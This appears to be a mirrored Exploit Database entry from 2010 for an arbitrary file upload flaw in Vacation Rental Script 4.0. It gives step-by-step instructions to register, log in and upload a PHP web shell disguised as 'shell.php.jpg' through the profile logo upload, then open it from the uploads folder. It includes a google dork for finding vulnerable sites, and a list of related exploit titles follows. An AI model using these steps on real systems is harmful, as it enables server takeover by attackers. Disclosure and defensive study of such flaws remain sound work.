Vacation Rental Script 4.0 – Arbitrary File Upload

Exploit Database
34 阅读

作者： Br0ly

日期： 2010-12-20
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/15793/

 Script Name: Vacation Rental Script <= 4.0
Site: http://www.vacationrentalscript.com/

Bug: Upload Shell
Found: Br0ly
google dork: "2006 - 2009 Vacation Rental Script"BraZIL!!

 You need register a account first so:

 Signup: http://server/signup

Cheek your email for login and password

So login in:

http://server/members/login

After login:
Go to:

http://server/members/profile

at the bottom of the page you can upload a logo why not a lithe and nice
shell?

Upload a shell type: shell.php.jpg or shell.php.jpeg

after upload:

http://server/public/upload/logos/youshell.php.jpg

last Exploits
Vacation Rental Script 4.0 – Arbitrary File Upload的更多信息

Apple WebKit 10.0.2 – ‘Frame::setDocument’ Universal Cross-Site Scripting：
Joomla! / Mambo Component com_trade – ‘PID’ Cross-Site Scripting：
B2B Script 4.27 – SQL Injection：
Kayako SupportSuite 3.x – Multiple Vulnerabilities：
Joomla! Component WMI 1.5.0 – Local File Inclusion：
WSC CMS – Authentication Bypass：
Online Hotel Reservation System 1.0 – ‘id’ Time-based SQL Injection：
Cart Engine 3.0.0 – Database Backup Disclosure：